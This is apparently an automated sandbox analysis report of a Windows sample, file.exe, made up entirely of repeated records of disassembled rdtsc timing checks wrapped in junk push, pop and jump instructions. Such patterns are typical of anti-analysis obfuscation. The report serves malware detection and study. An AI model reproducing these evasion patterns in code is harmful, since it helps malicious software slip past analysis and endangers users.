              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C45E second address: A2C4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF7B0C9CD4Ah 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jp 00007FF7B0C9CD46h 0x00000014 pop eax 0x00000015 push edi 0x00000016 jne 00007FF7B0C9CD46h 0x0000001c pop edi 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FF7B0C9CD48h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 push 00000000h 0x0000003b jmp 00007FF7B0C9CD4Fh 0x00000040 push 00000000h 0x00000042 xchg eax, esi 0x00000043 jne 00007FF7B0C9CD5Ch 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C4DD second address: A2C4E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C63C second address: A2C640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E327 second address: A2E32E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D60C second address: A2D628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D628 second address: A2D62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F534 second address: A2F538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F538 second address: A2F5EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d sub dword ptr [ebp+122D5876h], eax 0x00000013 or ebx, dword ptr [ebp+122D39C1h] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FF7B0F3BFC8h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a jo 00007FF7B0F3BFD8h 0x00000040 jmp 00007FF7B0F3BFD2h 0x00000045 mov dword ptr [ebp+122D1DE4h], ebx 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 cmc 0x00000053 mov eax, dword ptr [ebp+122D0ED1h] 0x00000059 jmp 00007FF7B0F3BFD5h 0x0000005e push FFFFFFFFh 0x00000060 mov dword ptr [ebp+122D580Ah], ebx 0x00000066 nop 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FF7B0F3BFD2h 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F5EC second address: A2F604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jp 00007FF7B0C9CD46h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36E88 second address: A36EA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF7B0F3BFCEh 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnc 00007FF7B0F3BFC6h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A367B2 second address: A367B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A367B6 second address: A367E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007FF7B0F3BFCDh 0x0000000d pushad 0x0000000e jnc 00007FF7B0F3BFC6h 0x00000014 jo 00007FF7B0F3BFC6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A367E3 second address: A367E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A367E7 second address: A3680B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FF7B0F3BFC6h 0x00000012 jmp 00007FF7B0F3BFD2h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3680B second address: A36820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3694F second address: A36968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF7B0F3BFD2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A47C second address: A3A492 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jg 00007FF7B0C9CD54h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A492 second address: A3A496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A496 second address: A3A4E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FF7B0C9CD59h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FF7B0C9CD52h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF7B0C9CD50h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A62B second address: A3A634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A634 second address: A3A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A638 second address: A3A666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jnc 00007FF7B0F3BFC8h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A666 second address: A3A66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A66A second address: A3A674 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A674 second address: A3A699 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7B0C9CD48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FF7B0C9CD55h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40C2D second address: A40C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D18FC second address: 9D1905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1905 second address: 9D190C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40131 second address: A4013F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FF7B0C9CD46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4013F second address: A40145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40145 second address: A40159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40159 second address: A4015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4015F second address: A40165 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40165 second address: A401AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FF7B0F3BFCDh 0x00000011 jmp 00007FF7B0F3BFD4h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF7B0F3BFCEh 0x0000001d jp 00007FF7B0F3BFC6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40345 second address: A40349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40498 second address: A404C4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF7B0F3BFCCh 0x00000008 jg 00007FF7B0F3BFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FF7B0F3BFD2h 0x00000019 pop edx 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404C4 second address: A404D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF7B0C9CD46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404D3 second address: A404D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40753 second address: A40758 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40758 second address: A4075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4075E second address: A4076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF7B0C9CD46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40919 second address: A4091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4091D second address: A40921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A436C9 second address: A43703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b ja 00007FF7B0F3BFCEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007FF7B0F3BFD2h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43703 second address: A43722 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF7B0C9CD54h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE449 second address: 9CE481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF7B0F3BFD5h 0x0000000d jmp 00007FF7B0F3BFD8h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4ABAE second address: A4ABB9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4ABB9 second address: A4ABFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD5h 0x00000009 jmp 00007FF7B0F3BFD1h 0x0000000e popad 0x0000000f push edi 0x00000010 jnp 00007FF7B0F3BFC6h 0x00000016 jnp 00007FF7B0F3BFC6h 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FF7B0F3BFC6h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A74E second address: A1A75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF7B0C9CD46h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AACC second address: A1AAD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF7B0F3BFC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AAD6 second address: A1AADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1ABC8 second address: A1AC00 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7B0F3BFC8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jg 00007FF7B0F3BFE0h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC00 second address: A1AC04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC04 second address: A1AC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC0A second address: A1AC2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF7B0C9CD46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f add dword ptr [ebp+122D2A07h], edx 0x00000015 push 329FDC86h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC2A second address: A1AC2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC2E second address: A1AC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC34 second address: A1AC3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1ACA7 second address: A1ACAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AD57 second address: A1ADBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jns 00007FF7B0F3BFC6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jnc 00007FF7B0F3BFC8h 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d call 00007FF7B0F3BFD2h 0x00000022 mov ecx, dword ptr [ebp+122D37EDh] 0x00000028 pop ecx 0x00000029 mov edx, dword ptr [ebp+122D26E3h] 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FF7B0F3BFD2h 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AE8D second address: A1AE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AE92 second address: A1AEBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF7B0F3BFD0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF7B0F3BFD1h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AEBF second address: A1AEC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AEC3 second address: A1AF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jno 00007FF7B0F3BFC6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jno 00007FF7B0F3BFDCh 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c jnp 00007FF7B0F3BFD1h 0x00000022 jmp 00007FF7B0F3BFCBh 0x00000027 jno 00007FF7B0F3BFD9h 0x0000002d popad 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push ebx 0x00000035 push edi 0x00000036 pop edi 0x00000037 pop ebx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AFC6 second address: A1AFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AFCC second address: A1AFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AFD0 second address: A1AFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AFDF second address: A1AFE9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B7AE second address: A1B7CB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF7B0C9CD51h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B8A2 second address: A1B8D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, si 0x0000000f lea eax, dword ptr [ebp+1247E243h] 0x00000015 pushad 0x00000016 xor si, 6E3Eh 0x0000001b mov bx, cx 0x0000001e popad 0x0000001f mov edi, dword ptr [ebp+122D39FDh] 0x00000025 nop 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 ja 00007FF7B0F3BFC6h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B8D7 second address: A1B90B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FF7B0C9CD53h 0x00000010 jmp 00007FF7B0C9CD4Dh 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 jns 00007FF7B0C9CD4Ch 0x0000001e jng 00007FF7B0C9CD46h 0x00000024 push eax 0x00000025 push edx 0x00000026 jns 00007FF7B0C9CD46h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B90B second address: 9FBA41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb cl, FFFFFFC2h 0x0000000b mov dword ptr [ebp+122D5880h], ecx 0x00000011 call dword ptr [ebp+1244516Ah] 0x00000017 jmp 00007FF7B0F3BFCBh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBA41 second address: 9FBA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBA45 second address: 9FBA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBA49 second address: 9FBA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF7B0C9CD4Ah 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBA59 second address: 9FBA5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBA5F second address: 9FBA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49D2B second address: A49D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49D31 second address: A49D63 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF7B0C9CD4Ch 0x00000008 pushad 0x00000009 jnp 00007FF7B0C9CD46h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF7B0C9CD4Dh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jo 00007FF7B0C9CD50h 0x0000001f pushad 0x00000020 push eax 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49EAF second address: A49EDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF7B0F3BFD8h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49EDF second address: A49EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49EE3 second address: A49EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF7B0F3BFC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
